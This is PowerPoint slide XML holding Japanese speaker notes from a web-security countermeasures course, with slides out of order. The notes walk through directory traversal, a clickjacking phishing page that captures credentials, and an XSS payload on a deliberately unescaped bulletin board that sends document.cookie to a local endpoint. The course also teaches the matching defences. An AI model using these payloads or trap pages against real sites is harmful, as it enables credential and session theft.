        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20040168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定義していないフォルダに対してもアクセスを遮断することが可能です。しかし、最終的なパスが</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>であればアクセスできるため、ディレクトリを深く作っている場合にプログラム次第ではアクセスできてしまうため、この手法も脆弱になります。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124</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35122627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ここで、ファイルの扱いについて補足をします。サービスを不特定多数のユーザが使う場合、同じファイル名が送られる可能性があり、その場合ファイルが上書きされるため、何らかのワンタイムトークンや</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に秒の小数点を含む日時などでファイル名を変えつつ元のファイル名をデータベースで保存して重複が無いようにすることもファイルを扱うときの工夫の一つです。また、サービスによってはディレクトリ内にディレクトリを作る事もあるため全てファイル名のみを取り出してしまうと使いにくくなる場合があるため、対策と使いやすさについても検討する必要があ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125</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40922921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また、こういったサービスは多くの場合ログインして行います。そのため、ログインした時に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>となるセッションを発行して、定義したフォルダ名とセッション情報を組み合わせることもできます。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126</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306938851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次にクリックジャッキングです。クリックジャッキングは他のページを持ってきて、罠となるページを透明にして重ねることでページを偽装し、利用者にとって意図しない操作を行わせる攻撃手法です。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>では</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>IFRAME</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグを使用することで、特に著名なサイトと見た目を同じにしてユーザに存在を気付かせないようにさせます。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127</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226468172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分かりやすく仕組みを図にするとこのようになります。一見すると普通のサイトですが、実際には普通のサイトを埋め込んで、その上に罠となるサイトを透明にして貼り付けることでユーザには分からないようにしま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128</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21576290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このクリックジャッキングによって起こりうる被害として代表的なものとしては、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>同様、対象のサイトに対してユーザが意図しない操作をされることや意図しない設定をされたり、退会処理等をされることが有ります。他には、応用次第でいわゆるフィッシング詐欺を作る事が出来ます。フィッシング詐欺では有名サイトのログイン画面を埋め込み、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパスワードを入力させるように誘導してログイン情報を盗みます。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129</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417001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それでは実行してアクセスしてみます。まず普通のテキストは当然ですが、送ることができます。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13</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329183194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フィッシング詐欺のサイトを実際に作成します。本来のサイトではログインした時にログイン成功したことを知らせるテキストを出力します。罠サイトでは入力されたメールアドレスとパスワードを表示します。ここで、透明にするのは罠サイトのデザインのみで、テキストボックスについては本来のサイトと同じ位置にして表示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130</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3951915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では実際にプログラムを作ります。まず、ライブラリのインポートと、データベース接続、セッションの発行とログイン画面へのリダイレクトになります。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131</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277729223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次に本来のサイトでのログイン画面です。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132</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295693930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そして、ログインに成功した時のプログラムがこちらになります。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133</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15310084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また、サーバ側で使用するログイン画面の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>はこのようになります。スタイルシートを使って位置を調節しています。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134</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366866017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次にフィッシング詐欺のサイトのコードです。ボタンを押したときの操作は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いて入力した内容を出力します。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135</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249848786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それでは実行してブラウザで表示します。罠サイトは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ファイルをそのまま開きます。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136</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421289121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ログイン後の画面はこのようになります。正常なサイトではログイン成功と出力し、罠サイトでは入力された内容を出力します。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137</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45011348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では、罠サイトを工夫してユーザから見分けがつきにくくします。まず罠サイトに使われる</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグのテキストを透明にして、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグとテキストボックスと</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグに対して位置を調節します。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138</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221901200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すると外部に枠の線がありますが、それを除いて一見すると正常なサイトと見分けがつかなくなります。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139</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2563750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ではここで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のコードを埋め込みます。入力内容は、スクリプトタグの間に、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>という関数で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と中に入れます。これを送信すると右のようにアラートが表示されます。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14</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399843883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ここで、ログイン情報を実際に打ち込みます。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140</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6953615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すると罠サイトの挙動通りに認証に使ったメールアドレスとパスワードが表示されます。実際にはこの内容は攻撃者のサーバのデータベースに保存され、不正なログインに使用されてしまいます。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141</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26197927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ではクリックジャッキングの防ぎ方ですが、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>レスポンスヘッダに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>X-Frame-Option</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>という設定が有り、ここでサイトから読み込まれるときの内容を制限できます。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142</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15856188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一例として、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の実行プログラムの前にこのようなコードを入れます。ここでは、設定を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SAMEORIGIN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>として他のドメインのサイトからは読み込まれないようにします。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143</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418406417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すると今度は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>IFRAME</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグが読み込まれなくなり、読み込まれない理由の上に罠用のテキストボックスとボタンが表示されます。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144</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272213969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最後にまとめです。まず当然ですが、不正アクセスをすると法律に触れます。また、サイバー犯罪で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>番目に多いのが</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>系プログラミングに見られるインジェクションです。被害は大まかに不正ログイン・漏洩・改竄・不正送信が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
              <a:t>あります。不正アクセスの対処法としては</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策では</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を使います。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクション対策ではプレースホルダを使用します、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ではワンタイムトークンによるアクセスごとの認証をします。ディレクトリトラバーサルではファイル名のみを取り出します。クリックジャッキングでは同一ドメイン以外からページ埋め込みを禁止するように設定します。以上で脆弱性対策講座を終わりま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145</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422898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この現象が起きた理由ですが、ブラウザ画面を右クリックして、ソースコードを確認してみると、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の内容が埋め込まれて、それが実行されたことが分かります。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15</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2963380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ういったことができてしまうと想定できる被害ですが、代表的な物として、まずクッキーの漏洩ですが、これはブラウザ内に保存されている現在見ているサイトのクッキーの中身を表示するものです。特に問題なのがクッキーの中にはサイト内での操作を記録した情報や、ログイン後に発行される、セッションを奪うことができてしまうことです。また、もう一つ代表例として、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の機能として任意のページにジャンプする機能があり、意図しない有害サイトに飛ばされることがあります。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16</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1861647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では実際にクッキーの漏洩をやってみます。作成するサービスとしては、第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>回で作成した掲示板サービスで、ログインしたらスレッドのタイトル</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に関わらず、すべてを表示するサービスです。まず、ライブラリのインポートと、データベースの接続とセッションの設定とログイン画面へのリダイレクトのプログラムになります。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17</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2064251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次にこちらがログイン画面でのプログラムです。ログインに成功したらセッションを発行します。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18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274316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掲示板の表示画面ですが、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のところで、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>htm.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を使わずにそのままデータベースの内容を表示します。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19</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421987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講座を始める前に、まず、注意事項です。この講座では、不正アクセスの対処法をプログラムで実装するにあたっての、理論とプログラムを学ぶ事を目的に不正アクセスを学びます。しかし、本講座は不正アクセスを推奨するものではありません。</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2</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="561144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最後にクッキーの情報を送られる</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の実行のプログラムです。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20</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23536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プログラムが完成したら実際に実行してみます。まず、ログインして掲示板を表示します。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21</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2713913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次に、スクリプトタグで囲ってウィンドウ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ロケーション＝ローカルホスト</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>5000</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>番の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>＝として、その後にドキュメント</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーと入れて送信をします。すると、このようにページジャンプしてクッキーの内容が表示されます。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22</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1850921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クッキーの内容がこれだったため、大きな被害に繋がりづらい内容でしたが、問題は、セッションキーが流出すると、不正にログインする事ができます。また、ここでは分かりやすく、ページジャンプで単に表示しただけですが、例えば</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>などで見えないように情報漏洩されることもあります。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23</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1915432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これは補足ですが、セッションキーハイジャックのやり方を説明します。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ではセッションキーが表示されなかったため</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
